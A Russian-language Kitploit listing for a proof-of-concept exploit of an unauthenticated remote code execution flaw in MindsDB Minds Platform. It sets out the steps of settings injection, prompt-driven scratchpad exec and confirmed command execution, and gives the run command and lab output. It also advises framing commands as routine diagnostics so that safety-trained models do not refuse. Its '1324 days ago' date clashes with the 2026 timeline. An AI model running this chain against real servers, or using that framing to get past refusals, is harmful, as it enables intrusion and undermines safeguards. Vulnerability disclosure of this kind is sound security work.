Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-73678-PoC — CVE-2026-73678 — MindsDB Minds Platform: неаутентифицированное удалённое выполнение кода (RCE) через scratchpad exec (CVSS 10.0). Проверено от начала до конца с реальной LLM. | Kitploit
Инструменты/GitHubGitHub/boreas37/cve-2026-73678-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийБезопасность ИИ
GitHubboreas37/cve-2026-73678-poc

CVE-2026-73678-PoC

CVE-2026-73678 — MindsDB Minds Platform: неаутентифицированное удалённое выполнение кода (RCE) через scratchpad exec (CVSS 10.0). Проверено от начала до конца с реальной LLM.

Репозиторий
1324 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-73678 — MindsDB Minds Platform: неаутентифицированное удалённое выполнение кода (RCE) (CVSS 10.0)

CVSS 10.0 (критический) · CWE-94 / CWE-306 · GHSA-jcxw-h8ph-pxpv · VulnCheck

Краткое описание

Minds Platform (open-source бэкенд репозитория mindsdb/mindshub, ранее mindsdb/minds-platform) предоставляет эндпоинт POST /api/v1/responses/ (совместимый с OpenAI Responses API, порт 26866) вообще без аутентификации. Промежуточное ПО для аутентификации отсутствует — ни проверки Bearer-токена, ни сессии, ничего. На сервере установлено только всеразрешающее CORS-промежуточное ПО (allow_origins=["*"], allow_credentials=True).

Таким образом, неаутентифицированный злоумышленник может:

Внедрить собственную конфигурацию LLM через PUT /api/v1/settings/{key} (openai_api_key, openai_base_url, planning_provider, coding_provider, *_model) — токен не требуется, все запросы возвращают 200.

  • Отправить специально сформированный промпт на POST /api/v1/responses/ → ResponsesHandler.handle() → Anton ChatSession.turn_stream(input).

  • Контролируемая злоумышленником LLM возвращает вызов функции для встроенного инструмента scratchpad (action: "exec"). Цепочка вызовов: handle_scratchpad → prepare_scratchpad_exec → ScratchpadManager → LocalScratchpadRuntime → scratchpad_boot.py:

    root@kitploit:~
    compiled = compile(code, "<scratchpad>", "exec")
    exec(compiled, namespace)   # arbitrary Python → arbitrary OS commands
    
  • Поскольку эндпоинт LLM выбирается злоумышленником (BYOK), он может заставить модель вернуть любой код scratchpad — ни сотрудничества, ни принуждения модели не требуется. Единственное предусловие — рабочий API-ключ совместимой с OpenAI LLM.

    Затронутые версии: ≤ v26.1.0 (уязвимый код добавлен 2026-06-08, "Fresh #12461"). Исправлений: НЕТ — в GHSA не указана исправленная версия; exec() остаётся в main (существуют только опциональное, выключенное по умолчанию Bearer-промежуточное ПО COWORK_REQUIRE_AUTH и проверки области видимости org-mode).

    Эксплуатация

    root@kitploit:~
    python3 poc_cve-2026-73678.py \
      --target http://TARGET:26866 \
      --api-key sk-YOUR_OWN_KEY \
      --base-url https://api.openai.com/v1 \
      --model gpt-4o
    

    PoC-скрипт:

    1. Записывает настройки злоумышленника через не требующий аутентификации PUT /api/v1/settings/*
    2. Отправляет безобидно выглядящий промпт «диагностика системы» (выполняет uname -a + hostname через scratchpad exec)
    3. Выводит ответ LLM; подтверждение — cat /tmp/system_info.txt на хосте

    Примечание по промпт-инжинирингу: модели с сильной тренировкой безопасности могут отказаться выполнять явно вредоносные команды (например, имена файлов, содержащие «pwn»). Оформите запрос как рутинное обслуживание (диагностика системы, проверка работоспособности) — scratchpad выполняет любой код, который предоставит модель.

    Верификация (2026-08-16, Docker-лаборатория, ARM64)

    Реальная сквозная цепочка атак против cowork-server==0.26.6.26.1 с реальным LLM-провайдером (OpenCode Zen, minimax-m3):

    root@kitploit:~
    == [1] AUTH-FREE SETTINGS INJECTION ==
      PUT /api/v1/settings/openai_api_key:     HTTP 200
      PUT /api/v1/settings/openai_base_url:    HTTP 200
      PUT /api/v1/settings/planning_provider:  HTTP 200
      PUT /api/v1/settings/coding_provider:    HTTP 200
      PUT /api/v1/settings/planning_model:     HTTP 200
      PUT /api/v1/settings/coding_model:       HTTP 200
    
    == [2] CRAFTED PROMPT -> POST /api/v1/responses/ ==
      HTTP 200 (15.6s) — LLM called the scratchpad tool
    
    == [3] COMMAND EXECUTION CONFIRMED ==
      /tmp/system_info.txt inside the container:
        Linux 95d5d7fa74f6 6.12.75+rpt-rpi-2712 ... aarch64 GNU/Linux
        95d5d7fa74f6
    

    Ни в один момент не был отправлен ни один токен. Вывод uname -a был получен внутри целевого контейнера через exec в scratchpad — выполнение произвольных OS-команд неаутентифицированным удалённым злоумышленником.

    Влияние

    • Неаутентифицированное удалённое выполнение кода на любом доступном извне экземпляре Minds Platform (порт по умолчанию 26866).
    • CORS-шаблон «*» в сочетании с credentials означает, что вредоносный веб-сайт также может запустить цепочку атак из браузера жертвы (drive-by / DNS-rebinding).
    • Дополнительные поверхности без аутентификации: GET /api/v1/settings/reveal-key/{name} раскрывает настроенные секреты; POST /api/v1/settings/raw записывает ~/.anton/.env.

    Ссылки

    • GHSA: https://github.com/mindsdb/minds-platform/security/advisories/GHSA-jcxw-h8ph-pxpv
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-73678
    • VulnCheck: https://www.vulncheck.com/advisories/mindsdb-minds-platform-unauthenticated-rce-via-scratchpad-exec
    • Проект: https://github.com/mindsdb/minds-platform (теперь mindsdb/mindshub)
    Скачать инструмент